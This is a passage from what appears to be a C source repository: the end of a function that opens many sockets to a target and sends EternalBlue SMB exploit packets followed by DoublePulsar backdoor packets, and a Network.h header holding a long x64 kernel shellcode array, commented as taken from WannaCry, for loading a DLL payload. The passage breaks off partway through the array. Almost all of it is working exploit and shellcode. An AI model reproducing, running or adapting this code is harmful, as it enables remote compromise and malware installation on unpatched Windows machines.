sizeof(server)); 399 | 400 | send(s15, (char*)unknown_packet_socket15, sizeof(unknown_packet_socket15) - 1, 0); 401 | 402 | send(s16, (char*)negociate_socket16, sizeof(negociate_socket16) - 1, 0); 403 | recv(s16, (char*)recvbuff, sizeof(recvbuff), 0); 404 | 405 | send(s16, (char*)unknown_packet_socket16, sizeof(unknown_packet_socket16) - 1, 0); 406 | //get information 407 | recv(s16, (char*)recvbuff, sizeof(recvbuff), 0); 408 | 409 | closesocket(s2); 410 | 411 | connect(s17, (struct sockaddr*) & server, sizeof(server)); 412 | send(s17, (char*)unknown_packet_socket17, sizeof(unknown_packet_socket17) - 1, 0); 413 | 414 | connect(s18, (struct sockaddr*) & server, sizeof(server)); 415 | connect(s19, (struct sockaddr*) & server, sizeof(server)); 416 | 417 | send(s18, (char*)unknown_packet_socket18, sizeof(unknown_packet_socket18) - 1, 0); 418 | 419 | connect(s20, (struct sockaddr*) & server, sizeof(server)); 420 | send(s19, (char*)unknown_packet_socket19, sizeof(unknown_packet_socket19) - 1, 0); 421 | 422 | connect(s21, (struct sockaddr*) & server, sizeof(server)); 423 | send(s20, (char*)unknown_packet_socket20, sizeof(unknown_packet_socket20) - 1, 0); 424 | send(s21, (char*)unknown_packet_socket21, sizeof(unknown_packet_socket21) - 1, 0); 425 | 426 | closesocket(s16); 427 | 428 | send(s1, (char*)smbecho_socket1, sizeof(smbecho_socket1) - 1, 0); 429 | recv(s1, (char*)recvbuff, sizeof(recvbuff), 0); 430 | 431 | send(s1, (char*)last_eternalblue_packet, sizeof(last_eternalblue_packet) - 1, 0); 432 | send(s1, (char*)last_eternalblue_packet2, sizeof(last_eternalblue_packet2) - 1, 0); 433 | send(s1, (char*)last_eternalblue_packet3, sizeof(last_eternalblue_packet3) - 1, 0); 434 | recv(s1, (char*)recvbuff, sizeof(recvbuff), 0); 435 | 436 | //check for EternalBlue overwrite in response packet 437 | if (recvbuff[9] == 0x0d && recvbuff[10] == 0x00 && recvbuff[11] == 0x00 && recvbuff[12] == 0xc0) 438 | { 439 | //printf("Got STATUS_INVALID_PARAMETER! 
EternalBlue overwrite successful!\n"); 440 | //looking good so far if we reached this point 441 | } 442 | 443 | //send doublepulsar packets 444 | send(s3, (char*)doublepulsar_packet_socket3, sizeof(doublepulsar_packet_socket3) - 1, 0); 445 | send(s3, (char*)doublepulsar_packet2_socket3, sizeof(doublepulsar_packet2_socket3) - 1, 0); 446 | 447 | send(s4, (char*)doublepulsar_packet_socket4, sizeof(doublepulsar_packet_socket4) - 1, 0); 448 | send(s4, (char*)doublepulsar_packet2_socket4, sizeof(doublepulsar_packet2_socket4) - 1, 0); 449 | 450 | send(s5, (char*)doublepulsar_packet_socket5, sizeof(doublepulsar_packet_socket5) - 1, 0); 451 | send(s5, (char*)doublepulsar_packet2_socket5, sizeof(doublepulsar_packet2_socket5) - 1, 0); 452 | 453 | send(s6, (char*)doublepulsar_packet_socket6, sizeof(doublepulsar_packet_socket6) - 1, 0); 454 | send(s6, (char*)doublepulsar_packet2_socket6, sizeof(doublepulsar_packet2_socket6) - 1, 0); 455 | send(s7, (char*)doublepulsar_packet_socket7, sizeof(doublepulsar_packet_socket7) - 1, 0); 456 | send(s7, (char*)doublepulsar_packet2_socket7, sizeof(doublepulsar_packet2_socket7) - 1, 0); 457 | send(s8, (char*)doublepulsar_packet_socket8, sizeof(doublepulsar_packet_socket8) - 1, 0); 458 | send(s8, (char*)doublepulsar_packet2_socket8, sizeof(doublepulsar_packet2_socket8) - 1, 0); 459 | send(s9, (char*)doublepulsar_packet_socket9, sizeof(doublepulsar_packet_socket9) - 1, 0); 460 | send(s9, (char*)doublepulsar_packet2_socket9, sizeof(doublepulsar_packet2_socket9) - 1, 0); 461 | send(s10, (char*)doublepulsar_packet_socket10, sizeof(doublepulsar_packet_socket10) - 1, 0); 462 | send(s10, (char*)doublepulsar_packet2_socket10, sizeof(doublepulsar_packet2_socket10) - 1, 0); 463 | send(s11, (char*)doublepulsar_packet_socket11, sizeof(doublepulsar_packet_socket11) - 1, 0); 464 | send(s11, (char*)doublepulsar_packet2_socket11, sizeof(doublepulsar_packet2_socket11) - 1, 0); 465 | send(s12, (char*)doublepulsar_packet_socket12, 
sizeof(doublepulsar_packet_socket12) - 1, 0); 466 | send(s12, (char*)doublepulsar_packet2_socket12, sizeof(doublepulsar_packet2_socket12) - 1, 0); 467 | send(s13, (char*)doublepulsar_packet_socket13, sizeof(doublepulsar_packet_socket13) - 1, 0); 468 | send(s13, (char*)doublepulsar_packet2_socket13, sizeof(doublepulsar_packet2_socket13) - 1, 0); 469 | send(s14, (char*)doublepulsar_packet_socket14, sizeof(doublepulsar_packet_socket14) - 1, 0); 470 | send(s14, (char*)doublepulsar_packet2_socket14, sizeof(doublepulsar_packet2_socket14) - 1, 0); 471 | send(s15, (char*)doublepulsar_packet_socket15, sizeof(doublepulsar_packet_socket15) - 1, 0); 472 | send(s15, (char*)doublepulsar_packet2_socket15, sizeof(doublepulsar_packet2_socket15) - 1, 0); 473 | 474 | send(s17, (char*)doublepulsar_packet_socket17, sizeof(doublepulsar_packet_socket17) - 1, 0); 475 | send(s17, (char*)doublepulsar_packet2_socket17, sizeof(doublepulsar_packet2_socket17) - 1, 0); 476 | send(s18, (char*)doublepulsar_packet_socket18, sizeof(doublepulsar_packet_socket18) - 1, 0); 477 | send(s18, (char*)doublepulsar_packet2_socket18, sizeof(doublepulsar_packet2_socket18) - 1, 0); 478 | send(s19, (char*)doublepulsar_packet_socket19, sizeof(doublepulsar_packet_socket19) - 1, 0); 479 | send(s19, (char*)doublepulsar_packet2_socket19, sizeof(doublepulsar_packet2_socket19) - 1, 0); 480 | send(s20, (char*)doublepulsar_packet_socket20, sizeof(doublepulsar_packet_socket20) - 1, 0); 481 | send(s20, (char*)doublepulsar_packet2_socket20, sizeof(doublepulsar_packet2_socket20) - 1, 0); 482 | 483 | send(s21, (char*)doublepulsar_packet_socket21, sizeof(doublepulsar_packet_socket21) - 1, 0); 484 | send(s21, (char*)doublepulsar_packet2_socket21, sizeof(doublepulsar_packet2_socket21) - 1, 0); 485 | 486 | //send doublepulsar packets 487 | send(s3, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 488 | send(s4, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 489 | send(s5, (char*)doublepulsar_pkt, 
sizeof(doublepulsar_pkt) - 1, 0); 490 | send(s6, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 491 | send(s7, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 492 | send(s8, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 493 | send(s9, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 494 | send(s10, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 495 | send(s11, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 496 | send(s12, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 497 | send(s13, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 498 | send(s14, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 499 | send(s15, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 500 | //closed socket 16 already 501 | send(s17, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 502 | send(s18, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 503 | send(s19, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 504 | send(s20, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 505 | send(s21, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 506 | 507 | //mass close sockets 508 | closesocket(s3); 509 | closesocket(s4); 510 | closesocket(s5); 511 | closesocket(s6); 512 | closesocket(s7); 513 | closesocket(s8); 514 | closesocket(s9); 515 | closesocket(s10); 516 | closesocket(s11); 517 | closesocket(s12); 518 | closesocket(s13); 519 | closesocket(s14); 520 | closesocket(s15); 521 | closesocket(s17); 522 | 523 | //send disconnect 524 | send(s1, (char*)disconnect, sizeof(disconnect) - 1, 0); 525 | 526 | closesocket(s18); 527 | closesocket(s19); 528 | closesocket(s20); 529 | closesocket(s21); 530 | 531 | recv(s1, (char*)recvbuff, sizeof(recvbuff), 0); 532 | 533 | //send logoff 534 | send(s1, (char*)logoff, sizeof(logoff) - 1, 0); 535 | recv(s1, (char*)recvbuff, sizeof(recvbuff), 0); 536 | 537 | //close first socket 538 | closesocket(s1); 539 | 
540 | //cleanup 541 | return 0; 542 | } 543 | -------------------------------------------------------------------------------- /Network.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | //64 bit kernel shellcode to run DLL - taken from Wannacry, this is sent before the DLL payload 4 | unsigned char x64_kernel_shellcode[] = 5 | "\x48\x89\xE0\x66\x83\xE4\xF0\x41\x57\x41\x56\x41\x55\x41\x54\x53" 6 | "\x51\x52\x55\x57\x56\x50\x50\xE8\xBC\x06\x00\x00\x48\x89\xC3\x48\xB9\xDF\x81\x14\x3E\x00\x00\x00\x00\xE8\x26" 7 | "\x05\x00\x00\x48\x85\xC0\x0F\x84\x55\x03\x00\x00\x48\x89\x05\x9C\x07\x00\x00\x48\xB9\xBA\x1E\x03\xA0\x00\x00" 8 | "\x00\x00\xE8\x07\x05\x00\x00\x48\x85\xC0\x0F\x84\x36\x03\x00\x00\x48\x89\x05\x85\x07\x00\x00\x48\xB9\x84\x06" 9 | "\xE7\xF9\xFF\xFF\xFF\xFF\xE8\xE8\x04\x00\x00\x48\x85\xC0\x0F\x84\x17\x03\x00\x00\x48\x89\x05\x6E\x07\x00\x00" 10 | "\x48\xB9\x4F\xFE\xEB\x15\x00\x00\x00\x00\xE8\xC9\x04\x00\x00\x48\x85\xC0\x0F\x84\xF8\x02\x00\x00\x48\x89\x05" 11 | "\x57\x07\x00\x00\x48\xB9\xF9\x30\xAC\xA4\x00\x00\x00\x00\xE8\xAA\x04\x00\x00\x48\x85\xC0\x0F\x84\xD9\x02\x00" 12 | "\x00\x48\x89\x05\x40\x07\x00\x00\x48\xB9\xCA\xBE\xD0\xEC\x00\x00\x00\x00\xE8\x8B\x04\x00\x00\x48\x85\xC0\x0F" 13 | "\x84\xBA\x02\x00\x00\x48\x89\x05\x29\x07\x00\x00\x48\xB9\xAE\xB8\x9F\x5D\xFF\xFF\xFF\xFF\xE8\x6C\x04\x00\x00" 14 | "\x48\x85\xC0\x0F\x84\x9B\x02\x00\x00\x48\x89\x05\x12\x07\x00\x00\x48\xB9\x94\x01\x69\xE3\xFF\xFF\xFF\xFF\xE8" 15 | "\x4D\x04\x00\x00\x48\x85\xC0\x0F\x84\x7C\x02\x00\x00\x48\x89\x05\xFB\x06\x00\x00\x48\xB9\xF6\x10\x00\xB8\xFF" 16 | "\xFF\xFF\xFF\xE8\x2E\x04\x00\x00\x48\x85\xC0\x0F\x84\x5D\x02\x00\x00\x48\x89\x05\xE4\x06\x00\x00\x48\xB9\xCA" 17 | "\xD6\x5F\xD2\xFF\xFF\xFF\xFF\xE8\x0F\x04\x00\x00\x48\x85\xC0\x0F\x84\x3E\x02\x00\x00\x48\x89\x05\xCD\x06\x00" 18 | "\x00\x48\xB9\x79\xA8\x24\x11\x00\x00\x00\x00\xE8\xF0\x03\x00\x00\x48\x85\xC0\x0F\x84\x1F\x02\x00\x00\x48\x89" 19 | 
"\x05\xB6\x06\x00\x00\x48\xB9\x37\xC6\x90\x4F\x00\x00\x00\x00\xE8\xD1\x03\x00\x00\x48\x85\xC0\x0F\x84\x00\x02" 20 | "\x00\x00\x48\x89\x05\x9F\x06\x00\x00\x48\xB9\x6C\xE7\xFE\x10\x00\x00\x00\x00\xE8\xB2\x03\x00\x00\x48\x85\xC0" 21 | "\x0F\x84\xE1\x01\x00\x00\x48\x89\x05\x88\x06\x00\x00\xE8\x4F\x03\x00\x00\x8B\x05\x85\x06\x00\x00\x85\xC0\x0F" 22 | "\x84\xC7\x01\x00\x00\xE8\xD9\x01\x00\x00\x48\x85\xC0\x0F\x84\xB9\x01\x00\x00\x4C\x8D\x0D\x94\x06\x00\x00\x41" 23 | "\x8B\x09\x51\x51\x6A\x40\x68\x00\x10\x00\x00\x4D\x31\xC0\x48\x8D\x15\xD2\x05\x00\x00\x48\xB9\xFF\xFF\xFF\xFF" 24 | "\xFF\xFF\xFF\xFF\x48\x83\xEC\x20\xFF\x15\x06\x06\x00\x00\x48\x83\xC4\x38\x59\x89\x0D\x5F\x06\x00\x00\x48\x85" 25 | "\xC0\x0F\x85\x22\x01\x00\x00\x48\x8D\x35\x57\x06\x00\x00\x48\x8B\x3D\x9C\x05\x00\x00\xF3\xA4\x80\x3D\x2F\x06" 26 | "\x00\x00\x01\x74\x05\xE8\x96\x02\x00\x00\x48\x8B\x35\x4D\x05\x00\x00\x8B\x0D\x0F\x06\x00\x00\x48\x01\xCE\x48" 27 | "\x89\xF1\x44\x8B\x25\x06\x06\x00\x00\x48\x8B\x11\x48\x39\xD6\x0F\x84\xDE\x00\x00\x00\x48\x31\xC0\x8B\x05\xDD" 28 | "\x05\x00\x00\x48\x29\xC2\x51\x52\x48\x89\xD1\x48\x83\xEC\x20\xFF\x15\xC3\x05\x00\x00\x48\x83\xC4\x20\x5A\x59" 29 | "\x48\x85\xC0\x74\x2E\x4D\x31\xC9\x44\x8B\x0D\xCE\x05\x00\x00\x4A\x8B\x04\x08\x48\x85\xC0\x74\x1B\x4C\x01\xE2" 30 | "\x80\x3D\xBF\x05\x00\x00\x01\x74\x07\x80\x3A\x01\x74\x0F\xEB\x08\x8B\x02\x0F\xBA\xE0\x05\x72\x05\x48\x8B\x09" 31 | "\xEB\x9B\x4C\x29\xE2\x48\x89\x15\x0B\x05\x00\x00\x48\xBA\x90\x00\x00\x00\x00\x00\x00\x00\x48\x31\xC9\x48\x83" 32 | "\xEC\x40\xFF\x15\x3C\x05\x00\x00\x48\x83\xC4\x40\x48\x85\xC0\x74\x5B\x48\x89\x05\xEC\x04\x00\x00\xC6\x80\x80" 33 | "\x00\x00\x00\xC3\x48\x31\xC9\x51\x6A\x01\xFF\x35\xC9\x04\x00\x00\x51\x4C\x8D\x88\x80\x00\x00\x00\x4D\x31\xC0" 34 | "\x48\x8B\x15\xBF\x04\x00\x00\x48\x89\xC1\x48\x83\xEC\x20\xFF\x15\x02\x05\x00\x00\x48\x83\xC4\x40\x4D\x31\xC9" 35 | "\x4D\x31\xC0\x48\x31\xD2\x48\x8B\x0D\xA6\x04\x00\x00\x48\x83\xEC\x20\xFF\x15\xEC\x04\x00\x00\x48\x83\xC4\x20" 36 | 
"\x48\x83\xEC\x20\x48\x8D\x0D\x4D\x04\x00\x00\xFF\x15\xAF\x04\x00\x00\x48\x8B\x0D\x38\x04\x00\x00\xFF\x15\xAA" 37 | "\x04\x00\x00\x48\x83\xC4\x20\x48\x31\xC0\x48\x8D\x3D\x9A\xFC\xFF\xFF\x48\xB9\x70\x03\x00\x00\x00\x00\x00\x00" 38 | "\xF3\xAA\x48\x8D\x3D\x2A\x00\x00\x00\x48\xB9\xD3\x04\x00\x00\x00\x00\x00\x00\x48\x03\x0D\xE4\x04\x00\x00\xF3" 39 | "\xAA\x58\x58\x5E\x5F\x5D\x5A\x59\x5B\x41\x5C\x41\x5D\x41\x5E\x41\x5F\x48\x89\xC4\x48\x31\xC0\xC3\x53\x56\x51" 40 | "\x52\x48\xB9\x08\x00\x00\x00\x00\x00\x00\x00\x51\x48\x8D\x15\xD1\x03\x00\x00\x48\x83\xEC\x20\xFF\x15\x17\x04" 41 | "\x00\x00\x48\x83\xC4\x20\x48\x85\xC0\x0F\x85\xDD\x00\x00\x00\x48\x8B\x35\xB3\x03\x00\x00\x48\x31\xDB\x8B\x1D" 42 | "\x66\x04\x00\x00\x8B\x04\x1E\x83\xF8\x02\x0F\x8C\xB0\x00\x00\x00\x48\x89\xF1\x48\x83\xEC\x20\xFF\x15\xE9\x03" 43 | "\x00\x00\x48\x83\xC4\x20\xE8\x57\x02\x00\x00\x8B\x0D\x5A\x04\x00\x00\x39\xC8\x0F\x85\x8C\x00\x00\x00\x48\x8D" 44 | "\x15\x7B\x03\x00\x00\x48\x89\xF1\x48\x83\xEC\x20\xFF\x15\xC6\x03\x00\x00\x48\x89\xF1\xFF\x15\xC5\x03\x00\x00" 45 | "\x48\x83\xC4\x20\x48\x85\xC0\x74\x49\x48\x31\xDB\x8B\x1D\x0B\x04\x00\x00\x48\x8B\x04\x18\x48\x85\xC0\x74\x37" 46 | "\x48\x31\xC9\x8B\x1D\xFD\x03\x00\x00\x66\x8B\x0C\x18\x48\x8B\x44\x18\x08\x48\x85\xC0\x74\x20\x48\x31\xDB\x8B" 47 | "\x1D\x02\x04\x00\x00\x48\x29\xD9\x7C\x12\x48\x01\xC8\xE8\x2B\x02\x00\x00\x8B\x0D\xEB\x03\x00\x00\x39\xC8\x74" 48 | "\x3F\x31\xC0\x89\x05\x03\x03\x00\x00\x48\x8D\x0D\x04\x03\x00\x00\x48\x83\xEC\x20\xFF\x15\x62\x03\x00\x00\x48" 49 | "\x83\xC4\x20\x48\x89\xF1\x48\x83\xEC\x20\xFF\x15\x59\x03\x00\x00\x48\x83\xC4\x20\x59\x81\xF9\x00\x00\x01\x00" 50 | "\x7F\x0E\x83\xC1\x04\xE9\xF3\xFE\xFF\xFF\x59\x48\x89\xF0\xEB\x03\x48\x31\xC0\x5A\x59\x5E\x5B\xC3\x48\x8B\x35" 51 | "\xB7\x02\x00\x00\x8B\x0D\x79\x03\x00\x00\x48\x01\xCE\x48\x8B\x16\x8B\x05\x5D\x03\x00\x00\x48\x29\xC2\x48\x31" 52 | "\xC0\x48\xFF\xC8\x48\xC1\xE0\x2C\x48\x8B\x12\x48\x39\xC2\x72\x0B\xB8\xE8\x03\x00\x00\x89\x05\x3D\x03\x00\x00" 53 | 
"\xC3\x56\x51\x52\x48\x83\xEC\x20\xFF\x15\x1F\x03\x00\x00\x48\x89\xC6\x8B\x05\x36\x03\x00\x00\x48\x01\xC6\xFF" 54 | "\x15\x05\x03\x00\x00\x48\x89\xF1\x48\x39\xF0\x77\x17\x48\x8D\x90\x00\x05\x00\x00\x48\x39\xF2\x72\x0B\x48\x29" 55 | "\xC6\x89\x35\x00\x03\x00\x00\xEB\x08\x48\x8B\x36\x48\x39\xCE\x75\xDC\x48\x83\xC4\x20\x5A\x59\x5E\xC3\x53\x52" 56 | "\x51\x55\x48\x89\xE5\x48\x81\xEC\x00\x01\x00\x00\x57\x48\x89\xCF\x48\x89\xD8\x48\x89\x85\x00\xFF\xFF\xFF\xE8" 57 | "\xBB\x00\x00\x00\x48\x89\x85\x08\xFF\xFF\xFF\xE8\x48\x01\x00\x00\x48\x89\x85\x10\xFF\xFF\xFF\x48\x8B\x85\x00" 58 | "\xFF\xFF\xFF\x48\x8B\x8D\x08\xFF\xFF\xFF\xE8\x9A\x01\x00\x00\x48\x89\x85\x18\xFF\xFF\xFF\x48\x8B\x85\x00\xFF" 59 | "\xFF\xFF\x48\x8B\x8D\x08\xFF\xFF\xFF\xE8\x8F\x01\x00\x00\x48\x89\x85\x20\xFF\xFF\xFF\x48\x8B\x85\x00\xFF\xFF" 60 | "\xFF\x48\x8B\x8D\x08\xFF\xFF\xFF\xE8\x84\x01\x00\x00\x48\x89\x85\x28\xFF\xFF\xFF\x48\x8B\x85\x00\xFF\xFF\xFF" 61 | "\x48\x89\xF9\x48\x8B\x95\x20\xFF\xFF\xFF\x48\x8B\x9D\x10\xFF\xFF\xFF\xE8\x0F\x01\x00\x00\x48\x89\x85\x30\xFF" 62 | "\xFF\xFF\x48\x8B\x85\x28\xFF\xFF\xFF\x48\x8B\x8D\x30\xFF\xFF\xFF\xE8\x55\x01\x00\x00\x66\x89\xC2\x48\x8B\x85" 63 | "\x00\xFF\xFF\xFF\x48\x8B\x8D\x18\xFF\xFF\xFF\xE8\x49\x01\x00\x00\x5F\x48\x81\xC4\x00\x01\x00\x00\x5D\x59\x5A" 64 | "\x5B\xC3\x56\x57\x48\x31\xF6\x8B\x70\x3C\x48\x01\xC6\x66\x81\x3E\x50\x45\x75\x12\x48\x81\xC6\x88\x00\x00\x00" 65 | "\x48\x31\xFF\x8B\x3E\x48\x01\xF8\x5F\x5E\xC3\x48\x31\xC0\xEB\xF8\x56\x51\x57\x48\x89\xC6\x48\x31\xC0\x89\xC7" 66 | "\xC1\xE7\x07\x29\xC7\x89\xF8\x31\xC9\x8A\x0E\x80\xF9\x00\x74\x07\x01\xC8\x48\xFF\xC6\xEB\xE7\x5F\x59\x5E\xC3" 67 | "\x56\x57\x52\x48\x89\xC6\x48\x31\xC0\x89\xC7\xC1\xE7\x07\x29\xC7\x89\xF8\x31\xD2\x8A\x16\x01\xD0\x48\xFF\xC6" 68 | "\xE2\xEC\x5A\x5F\x5E\xC3\x56\x51\x57\x48\x89\xC6\x48\x31\xC0\x89\xC7\xC1\xE7\x07\x29\xC7\x89\xF8\x31\xC9\x8A" 69 | "\x0E\x80\xF9\x00\x74\x0A\x01\xC8\x48\xFF\xC6\x48\xFF\xC6\xEB\xE4\x5F\x59\x5E\xC3\x56\x48\x89\xC6\x48\x83\xC6" 70 | 
"\x18\x48\x31\xC0\x8B\x06\x5E\xC3\x53\x65\x48\x8B\x04\x25\x38\x00\x00\x00\x48\x8B\x40\x04\x48\xC1\xE8\x0C\x48" 71 | "\xC1\xE0\x0C\x48\x8B\x18\x66\x81\xFB\x4D\x5A\x74\x08\x48\x2D\x00\x10\x00\x00\xEB\xEE\x5B\xC3\x57\x56\x51\x48" 72 | "\x31\xFF\x48\x89\xC6\x48\x31\xC0\x8B\x04\xBA\x48\x01\xF0\xE8\x40\xFF\xFF\xFF\x39\xC8\x74\x0E\x48\xFF\xC7\x48" 73 | "\x39\xDF\x74\x0B\xEB\xE4\x59\x5E\x5F\xC3\x48\x89\xF8\xEB\xF7\x48\x31\xC0\xEB\xF2\x56\x48\x89\xC6\x48\x31\xC0" 74 | "\x8B\x41\x1C\x48\x01\xF0\x5E\xC3\x56\x48\x89\xC6\x48\x31\xC0\x8B\x41\x20\x48\x01\xF0\x5E\xC3\x56\x48\x89\xC6" 75 | "\x48\x31\xC0\x8B\x41\x24\x48\x01\xF0\x5E\xC3\x48\xD1\xE1\x48\x01\xC8\x66\x8B\x00\xC3\x48\x81\xCA\x00\x00\xFF" 76 | "\xFF\x48\x81\xF2\x00\x00\xFF\xFF\x48\xC1\xE2\x02\x48\x01\xD1\x48\x31\xD2\x8B\x11\x48\x01\xD0\xC3\x00\x00\x00" 77 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 78 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 79 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 80 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 81 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 82 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 83 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x03\x00\x00" 84 | "\x20\x00\x00\x00\x70\x00\x00\x00\x08\x03\x00\x00\x4C\x00\x00\x00\xC8\x02\x00\x00\x01\x00\x00\x00\xBD\xA2\x37" 85 | "\x83\x00\x00\x00\x00\x00\x00\x00\x00\x8A\x23\x00\x00\x00\x00\x00\x00\x53\x55\x57\x56\x41\x54\x41\x55\x41\x56" 86 | "\x41\x57\x48\x89\xE0\x48\x89\xE1\x48\x83\xE1\x08\x48\x29\xCC\x48\x81\xEC\x00\x04\x00\x00\xE8\x00\x00\x00\x00" 87 | 
"\x5D\x48\x89\xE6\x48\x89\x06\x48\x81\xEC\x00\x04\x00\x00\x48\x8D\x3D\xD2\x0E\x00\x00\x49\x89\xF0\x48\x83\xC6" 88 | "\x08\x48\x31\xC9\x8A\x0F\x84\xC9\x74\x3F\x48\xFF\xC7\x8B\x0F\x48\x83\xC7\x04\x8B\x17\x48\x83\xC7\x04\x84\xD2" 89 | "\x74\x2C\xE8\xD4\x0D\x00\x00\x51\x0F\xB6\x0F\x48\x85\xC9\x59\x75\x09\x48\x85\xC0\x0F\x84\xB9\x0D\x00\x00\x48" 90 | "\x89\x06\x48\x83\xC6\x08\x30\xC0\x48\x83\xC7\x01\x3A\x47\x04\x74\xCC\xEB\xB8\x4C\x89\xC6\x48\x89\x25\x3D\x0D" 91 | "\x00\x00\x48\x89\x2D\x3E\x0D\x00\x00\x48\x89\x35\x3F\x0D\x00\x00\x90\xE8\x00\x00\x00\x00\x59\x4D\x31\xC9\x49" 92 | "\x89\xC8\x48\x31\xD2\xB2\x01\x48\x8D\x0D\x2E\x0D\x00\x00\x48\x83\xEC\x20\xFF\x56\x38\x48\x83\xC4\x20\x49\xB9" 93 | "\x40\x00\x00\x00\x00\x00\x00\x00\x49\xB8\x00\x30\x00\x00\x00\x00\x00\x00\x48\x31\xD2\x8B\x95\x5D\x0F\x00\x00" 94 | "\x48\x31\xC9\x48\x83\xEC\x20\xFF\x56\x08\x48\x83\xC4\x20\x48\x85\xC0\x0F\x84\xCF\x0C\x00\x00\x48\x89\xC3\x56" 95 | "\x8B\x8D\x5D\x0F\x00\x00\x48\x8D\x35\x80\x0E\x00\x00\x48\x89\xDF\xF3\xA4\x5E\x48\x89\x5E\x48\x48\x31\xC0\x8B" 96 | "\x85\x5D\x0F\x00\x00\x48\x89\x46\x50\x48\x31\xC9\x8B\x8D\x5D\x0F\x00\x00\x48\x8D\x3D\x59\x0E\x00\x00\x31\xC0" 97 | "\xF3\xAA\x48\x31\xC0\x48\x89\x46\x58\x48\x89\x46\x60\x48\x89\x46\x68\x48\x8D\x05\x77\x09\x00\x00\x48\x89\x05" 98 | "\xC4\x02\x00\x00\x48\x8D\x05\x71\x09\x00\x00\x48\x89\x05\xBE\x02\x00\x00\x48\x8D\x05\x78\x09\x00\x00\x48\x89" 99 | "\x05\xB8\x02\x00\x00\x48\x8D\x05\x86\x09\x00\x00\x48\x89\x05\xB2\x02\x00\x00\x48\x8D\x05\xA7\x08\x00\x00\x48" 100 | "\x89\x05\xAC\x02\x00\x00\x55\x48\x8D\x2D\xD6\x01\x00\x00\x48\x8B\x7E\x48\xE8\xA3\x02\x00\x00\x48\x85\xC0\x0F" 101 | "\x85\x13\x01\x00\x00\xE8\x1A\x03\x00\x00\x48\x85\xC0\x0F\x84\x05\x01\x00\x00\x48\x89\x45\x20\x48\x8B\x7D\x08" 102 | "\x48\x83\xC7\x30\x48\x8B\x3F\x48\x8B\x45\x20\x48\x29\xF8\x48\x89\x45\x28\xE8\x64\x03\x00\x00\x48\x85\xC0\x0F" 103 | "\x85\xDD\x00\x00\x00\xE8\xE6\x03\x00\x00\x48\x85\xC0\x0F\x85\xCF\x00\x00\x00\xE8\x4E\x05\x00\x00\x48\x85\xC0" 104 | 
"\x0F\x85\xC1\x00\x00\x00\xE8\x57\x05\x00\x00\x48\x85\xC0\x0F\x85\xB3\x00\x00\x00\xE8\x57\x06\x00\x00\x48\x85" 105 | "\xC0\x0F\x85\xA5\x00\x00\x00\xE8\xBA\x06\x00\x00\x48\x85\xC0\x0F\x85\x97\x00\x00\x00\xE8\xC6\x07\x00\x00\x48" 106 | "\x85\xC0\x0F\x85\x89\x00\x00\x00\x48\x8B\x45\x20\x48\x89\x46\x70\x48\x8B\x45\x18\x48\x89\x46\x78\x5D\x8B\x85" 107 | "\x61\x0F\x00\x00\x89\x86\x80\x00\x00\x00\x48\x8B\x56\x70\x48\x63\x42\x3C\x48\x8D\x9C\x10\x88\x00\x00\x00\x48" 108 | "\x85\xDB\x74\x48\x8B\x1B\x48\x01\xD3\x83\x7B\x14\x00\x74\x3D\x8B\xBE\x80\x00\x00\x00\x2B\x7B\x10\x3B\x7B\x14" 109 | "\x7F\x2F\x8B\x4B\x1C\x48\x01\xD1\x8B\x04\xB9\x48\x01\xD0\x48\x83\xEC\x20\x4C\x8B\x46\x50\x48\x8B\x56\x48\x48" 110 | "\xB9\x02\x00\x00\x00\x00\x00\x00\x00\xFF\xD0\x48\x83\xC4\x20\x48\x89\x86\x88\x00\x00\x00\x55\x48\x8D\x2D\xB8" 111 | "\x00\x00\x00\xE8\x28\x07\x00\x00\xEB\x00\x48\x8B\x4D\x78\x48\x85\xC9\x74\x0B\x48\x83\xEC\x20\xFF\x56\x40\x48" 112 | "\x83\xC4\x20\x48\x8B\x7D\x20\x48\x85\xFF\x0F\x84\x8A\x00\x00\x00\x4C\x8D\x8D\xAA\x00\x00\x00\x49\xB8\x40\x00" 113 | "\x00\x00\x00\x00\x00\x00\x48\x8B\x55\x50\x48\x8B\x4D\x20\x48\x83\xEC\x20\xFF\x56\x30\x48\x83\xC4\x20\x48\x85" 114 | 